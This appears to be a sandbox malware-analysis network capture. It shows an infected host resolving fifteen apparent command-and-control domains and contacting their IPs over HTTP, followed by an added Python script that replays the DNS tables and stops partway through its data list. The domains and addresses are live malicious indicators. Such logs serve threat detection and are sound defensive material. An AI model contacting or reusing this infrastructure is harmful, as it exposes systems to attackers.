Sep 4, 2024 09:38:07.401818991 CEST  80     49773  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:07.401868105 CEST  49773  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:07.405008078 CEST  49773  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:07.409754038 CEST  80     49773  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:12.914067030 CEST  49774  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:12.918874025 CEST  80     49774  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:12.921488047 CEST  49774  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:12.932461977 CEST  49774  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:12.937232971 CEST  80     49774  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:13.501923084 CEST  80     49774  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:13.502162933 CEST  80     49774  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:13.502212048 CEST  49774  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:14.446254015 CEST  49774  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:15.465847969 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:15.634012938 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:15.634078979 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:15.647413969 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:15.652251959 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:16.370214939 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:16.370327950 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:16.370338917 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:16.373508930 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:16.681391001 CEST  80     49775  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:16.681444883 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:17.197180033 CEST  49775  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:18.217411995 CEST  49776  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:18.222251892 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.229409933 CEST  49776  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:18.237430096 CEST  49776  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:18.242396116 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242404938 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242414951 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242517948 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242530107 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242604971 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242614031 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242621899 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.242639065 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.803133011 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.808908939 CEST  80     49776  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:18.809483051 CEST  49776  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:19.743263006 CEST  49776  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:20.766514063 CEST  49777  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:20.771420956 CEST  80     49777  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:20.773485899 CEST  49777  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:20.780143023 CEST  49777  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:20.784878016 CEST  80     49777  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:21.370971918 CEST  80     49777  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:21.371066093 CEST  80     49777  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:21.371112108 CEST  49777  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:21.374198914 CEST  49777  80     192.168.2.4      64.64.237.133
Sep 4, 2024 09:38:21.379102945 CEST  80     49777  64.64.237.133    192.168.2.4
Sep 4, 2024 09:38:26.425218105 CEST  49778  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:26.430115938 CEST  80     49778  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:26.430453062 CEST  49778  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:26.440450907 CEST  49778  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:26.445271015 CEST  80     49778  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:27.086182117 CEST  80     49778  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:27.086328983 CEST  80     49778  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:27.089529037 CEST  49778  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:27.946196079 CEST  49778  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:28.967518091 CEST  49779  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:28.972390890 CEST  80     49779  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:28.975611925 CEST  49779  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:28.987690926 CEST  49779  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:28.992476940 CEST  80     49779  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:29.599603891 CEST  80     49779  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:29.599925041 CEST  80     49779  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:29.599978924 CEST  49779  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:30.493417025 CEST  49779  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:31.512372017 CEST  49780  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:31.520204067 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.520273924 CEST  49780  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:31.533190012 CEST  49780  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:31.538811922 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538814068 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538819075 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538820028 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538824081 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538836956 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538928032 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538943052 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:31.538959980 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:32.156059980 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:32.156105995 CEST  80     49780  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:32.156152964 CEST  49780  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:33.040067911 CEST  49780  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.059118986 CEST  49781  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.313354969 CEST  80     49781  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:34.313745022 CEST  49781  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.321432114 CEST  49781  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.326212883 CEST  80     49781  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:34.942066908 CEST  80     49781  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:34.942243099 CEST  80     49781  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:34.946091890 CEST  49781  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.946091890 CEST  49781  80     192.168.2.4      85.13.151.9
Sep 4, 2024 09:38:34.950891018 CEST  80     49781  85.13.151.9      192.168.2.4
Sep 4, 2024 09:38:40.401428938 CEST  49782  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:40.703083038 CEST  80     49782  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:40.703958988 CEST  49782  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:40.757430077 CEST  49782  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:40.762275934 CEST  80     49782  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:42.235805988 CEST  80     49782  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:42.236069918 CEST  80     49782  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:42.236301899 CEST  49782  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:42.258788109 CEST  49782  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:43.276964903 CEST  49783  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:43.281831026 CEST  80     49783  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:43.281908989 CEST  49783  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:43.293009043 CEST  49783  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:43.297858000 CEST  80     49783  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:44.783538103 CEST  80     49783  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:44.783802986 CEST  80     49783  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:44.783974886 CEST  49783  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:44.805608034 CEST  49783  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:45.825046062 CEST  49784  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:45.829912901 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.829962969 CEST  49784  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:45.843075991 CEST  49784  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:45.847969055 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.847979069 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.847994089 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848002911 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848010063 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848140001 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848191023 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848198891 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:45.848207951 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:47.341674089 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:47.341932058 CEST  80     49784  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:47.341969013 CEST  49784  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:47.352576971 CEST  49784  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:48.373433113 CEST  49785  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:48.378371954 CEST  80     49785  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:48.385427952 CEST  49785  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:48.388432980 CEST  49785  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:48.393294096 CEST  80     49785  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:49.896876097 CEST  80     49785  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:49.897182941 CEST  80     49785  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:49.897232056 CEST  49785  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:49.900093079 CEST  49785  80     192.168.2.4      104.21.35.73
Sep 4, 2024 09:38:49.907344103 CEST  80     49785  104.21.35.73     192.168.2.4
Sep 4, 2024 09:38:54.950464010 CEST  49786  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:54.955251932 CEST  80     49786  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:54.955451965 CEST  49786  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:54.983428001 CEST  49786  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:54.988199949 CEST  80     49786  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:55.450000048 CEST  80     49786  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:55.450339079 CEST  80     49786  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:55.450390100 CEST  49786  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:56.495449066 CEST  49786  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:57.529248953 CEST  49787  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:57.536259890 CEST  80     49787  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:57.536341906 CEST  49787  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:57.555475950 CEST  49787  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:57.560358047 CEST  80     49787  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:58.058960915 CEST  80     49787  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:58.058986902 CEST  80     49787  192.185.211.122  192.168.2.4
Sep 4, 2024 09:38:58.059050083 CEST  49787  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:38:59.071280956 CEST  49787  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:00.143090963 CEST  49788  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:00.148113012 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.148181915 CEST  49788  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:00.160928011 CEST  49788  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:00.165848017 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165860891 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165920019 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165930033 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165946960 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165956020 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.165988922 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.166054010 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.166064024 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.656829119 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.657135010 CEST  80     49788  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:00.657531023 CEST  49788  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:01.664988041 CEST  49788  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:02.683399916 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:03.644515991 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:03.644615889 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:03.925112963 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:03.930006981 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:04.143879890 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:04.143899918 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:04.143907070 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:04.143969059 CEST  80     49789  192.185.211.122  192.168.2.4
Sep 4, 2024 09:39:04.144026041 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:04.144026041 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:04.148107052 CEST  49789  80     192.168.2.4      192.185.211.122
Sep 4, 2024 09:39:04.152889013 CEST  80     49789  192.185.211.122  192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 4, 2024 09:35:45.988053083 CEST | 50311 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:35:46.000648975 CEST | 53 | 50311 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:36:01.995965004 CEST | 59829 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:36:02.020853043 CEST | 53 | 59829 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:36:15.543500900 CEST | 65079 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:36:15.579677105 CEST | 53 | 65079 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:36:29.277441025 CEST | 58406 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:36:29.289213896 CEST | 53 | 58406 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:36:42.515397072 CEST | 56962 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:36:42.693576097 CEST | 53 | 56962 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:36:56.277376890 CEST | 60103 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:36:56.296498060 CEST | 53 | 60103 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:37:09.589658976 CEST | 57165 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:37:09.899183989 CEST | 53 | 57165 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:37:23.215748072 CEST | 56397 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:37:24.008199930 CEST | 53 | 56397 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:37:37.574642897 CEST | 62825 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:37:37.584800959 CEST | 53 | 62825 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:37:45.639111996 CEST | 64195 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:37:45.741038084 CEST | 53 | 64195 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:37:59.061405897 CEST | 56692 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:37:59.082005024 CEST | 53 | 56692 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:38:12.419661999 CEST | 60780 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:38:12.911739111 CEST | 53 | 60780 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:38:26.387309074 CEST | 62863 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:38:26.422924995 CEST | 53 | 62863 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:38:39.966239929 CEST | 53833 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:38:40.396142960 CEST | 53 | 53833 | 1.1.1.1 | 192.168.2.4
Sep 4, 2024 09:38:54.926165104 CEST | 51739 | 53 | 192.168.2.4 | 1.1.1.1
Sep 4, 2024 09:38:54.938208103 CEST | 53 | 51739 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 4, 2024 09:35:45.988053083 CEST | 192.168.2.4 | 1.1.1.1 | 0x92f8 | Standard query (0) | www.weep.site | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:01.995965004 CEST | 192.168.2.4 | 1.1.1.1 | 0x367d | Standard query (0) | www.88nn.pro | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:15.543500900 CEST | 192.168.2.4 | 1.1.1.1 | 0xfc12 | Standard query (0) | www.fontanerourgente.net | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:29.277441025 CEST | 192.168.2.4 | 1.1.1.1 | 0x4200 | Standard query (0) | www.onlytradez.club | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:42.515397072 CEST | 192.168.2.4 | 1.1.1.1 | 0x78d1 | Standard query (0) | www.32wxd.top | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:56.277376890 CEST | 192.168.2.4 | 1.1.1.1 | 0x9f7c | Standard query (0) | www.jaxo.xyz | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:09.589658976 CEST | 192.168.2.4 | 1.1.1.1 | 0x669f | Standard query (0) | www.xforum.tech | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:23.215748072 CEST | 192.168.2.4 | 1.1.1.1 | 0xbad3 | Standard query (0) | www.cannulafactory.top | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:37.574642897 CEST | 192.168.2.4 | 1.1.1.1 | 0x60fe | Standard query (0) | www.taapbit.online | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:45.639111996 CEST | 192.168.2.4 | 1.1.1.1 | 0xe2a | Standard query (0) | www.ayypromo.shop | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:59.061405897 CEST | 192.168.2.4 | 1.1.1.1 | 0xc13d | Standard query (0) | www.anaidittrich.com | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:12.419661999 CEST | 192.168.2.4 | 1.1.1.1 | 0x8af8 | Standard query (0) | www.551108k5.shop | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:26.387309074 CEST | 192.168.2.4 | 1.1.1.1 | 0x19ad | Standard query (0) | www.datensicherung.email | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:39.966239929 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8c | Standard query (0) | www.jiyitf.top | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:54.926165104 CEST | 192.168.2.4 | 1.1.1.1 | 0x9249 | Standard query (0) | www.tadalaturbo.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 4, 2024 09:35:46.000648975 CEST | 1.1.1.1 | 192.168.2.4 | 0x92f8 | No error (0) | www.weep.site | weep.site | | CNAME (Canonical name) | IN (0x0001) | false
Sep 4, 2024 09:35:46.000648975 CEST | 1.1.1.1 | 192.168.2.4 | 0x92f8 | No error (0) | weep.site | | 194.233.65.154 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:02.020853043 CEST | 1.1.1.1 | 192.168.2.4 | 0x367d | No error (0) | www.88nn.pro | | 45.157.69.194 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:15.579677105 CEST | 1.1.1.1 | 192.168.2.4 | 0xfc12 | No error (0) | www.fontanerourgente.net | fontanerourgente.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 4, 2024 09:36:15.579677105 CEST | 1.1.1.1 | 192.168.2.4 | 0xfc12 | No error (0) | fontanerourgente.net | | 37.187.158.211 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:29.289213896 CEST | 1.1.1.1 | 192.168.2.4 | 0x4200 | No error (0) | www.onlytradez.club | | 167.172.133.32 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:42.693576097 CEST | 1.1.1.1 | 192.168.2.4 | 0x78d1 | No error (0) | www.32wxd.top | 32wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 4, 2024 09:36:42.693576097 CEST | 1.1.1.1 | 192.168.2.4 | 0x78d1 | No error (0) | 32wxd.top | | 206.119.82.116 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:36:56.296498060 CEST | 1.1.1.1 | 192.168.2.4 | 0x9f7c | No error (0) | www.jaxo.xyz | | 66.29.149.180 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:09.899183989 CEST | 1.1.1.1 | 192.168.2.4 | 0x669f | No error (0) | www.xforum.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:24.008199930 CEST | 1.1.1.1 | 192.168.2.4 | 0xbad3 | No error (0) | www.cannulafactory.top | | 18.183.3.45 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:37.584800959 CEST | 1.1.1.1 | 192.168.2.4 | 0x60fe | Name error (3) | www.taapbit.online | none | none | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:45.741038084 CEST | 1.1.1.1 | 192.168.2.4 | 0xe2a | No error (0) | www.ayypromo.shop | | 176.57.64.102 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:37:59.082005024 CEST | 1.1.1.1 | 192.168.2.4 | 0xc13d | No error (0) | www.anaidittrich.com | | 162.55.254.209 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:12.911739111 CEST | 1.1.1.1 | 192.168.2.4 | 0x8af8 | No error (0) | www.551108k5.shop | gangli.ssywan.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 4, 2024 09:38:12.911739111 CEST | 1.1.1.1 | 192.168.2.4 | 0x8af8 | No error (0) | gangli.ssywan.com | | 64.64.237.133 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:26.422924995 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ad | No error (0) | www.datensicherung.email | | 85.13.151.9 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:40.396142960 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8c | No error (0) | www.jiyitf.top | | 104.21.35.73 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:40.396142960 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8c | No error (0) | www.jiyitf.top | | 172.67.215.136 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 09:38:54.938208103 CEST | 1.1.1.1 | 192.168.2.4 | 0x9249 | No error (0) | www.tadalaturbo.online | tadalaturbo.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 4, 2024 09:38:54.938208103 CEST | 1.1.1.1 | 192.168.2.4 | 0x9249 | No error (0) | tadalaturbo.online | | 192.185.211.122 | A (IP address) | IN (0x0001) | false
                  • www.weep.site
                  • www.88nn.pro
                  • www.fontanerourgente.net
                  • www.onlytradez.club
                  • www.32wxd.top
                  • www.jaxo.xyz
                  • www.xforum.tech
                  • www.cannulafactory.top
                  • www.ayypromo.shop
                  • www.anaidittrich.com
                  • www.551108k5.shop
                  • www.datensicherung.email
                  • www.jiyitf.top
                  • www.tadalaturbo.online
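The DNS query and answer tables above are the raw material an analyst turns into indicators: each queried name must be followed through its CNAME chain to the A records, the one NXDOMAIN must be kept apart from the live hosts, and the spacing between queries shows the sample walking its domain list one host at a time. The following Python script is an added example and is not part of the Joe Sandbox report; its input is transcribed from the two DNS tables (timestamps are the query timestamps, CNAME rows carry no address), and the cadence observation is drawn from those timestamps alone.

```python
"""Added example (not part of the Joe Sandbox report): replay the DNS tables
above to obtain the resolver's view of the C2 candidate list and the cadence
at which the sample queried it."""

# Transcribed from the DNS queries table: (timestamp, transaction id, queried name).
QUERIES = [
    ("09:35:45.988053083", 0x92f8, "www.weep.site"),
    ("09:36:01.995965004", 0x367d, "www.88nn.pro"),
    ("09:36:15.543500900", 0xfc12, "www.fontanerourgente.net"),
    ("09:36:29.277441025", 0x4200, "www.onlytradez.club"),
    ("09:36:42.515397072", 0x78d1, "www.32wxd.top"),
    ("09:36:56.277376890", 0x9f7c, "www.jaxo.xyz"),
    ("09:37:09.589658976", 0x669f, "www.xforum.tech"),
    ("09:37:23.215748072", 0xbad3, "www.cannulafactory.top"),
    ("09:37:37.574642897", 0x60fe, "www.taapbit.online"),
    ("09:37:45.639111996", 0xe2a, "www.ayypromo.shop"),
    ("09:37:59.061405897", 0xc13d, "www.anaidittrich.com"),
    ("09:38:12.419661999", 0x8af8, "www.551108k5.shop"),
    ("09:38:26.387309074", 0x19ad, "www.datensicherung.email"),
    ("09:38:39.966239929", 0xc8c, "www.jiyitf.top"),
    ("09:38:54.926165104", 0x9249, "www.tadalaturbo.online"),
]

# Transcribed from the DNS answers table: (transaction id, rcode, name, cname, address).
# A CNAME row has no address; the NXDOMAIN row (rcode 3) has neither.
ANSWERS = [
    (0x92f8, 0, "www.weep.site", "weep.site", None),
    (0x92f8, 0, "weep.site", None, "194.233.65.154"),
    (0x367d, 0, "www.88nn.pro", None, "45.157.69.194"),
    (0xfc12, 0, "www.fontanerourgente.net", "fontanerourgente.net", None),
    (0xfc12, 0, "fontanerourgente.net", None, "37.187.158.211"),
    (0x4200, 0, "www.onlytradez.club", None, "167.172.133.32"),
    (0x78d1, 0, "www.32wxd.top", "32wxd.top", None),
    (0x78d1, 0, "32wxd.top", None, "206.119.82.116"),
    (0x9f7c, 0, "www.jaxo.xyz", None, "66.29.149.180"),
    (0x669f, 0, "www.xforum.tech", None, "103.224.182.242"),
    (0xbad3, 0, "www.cannulafactory.top", None, "18.183.3.45"),
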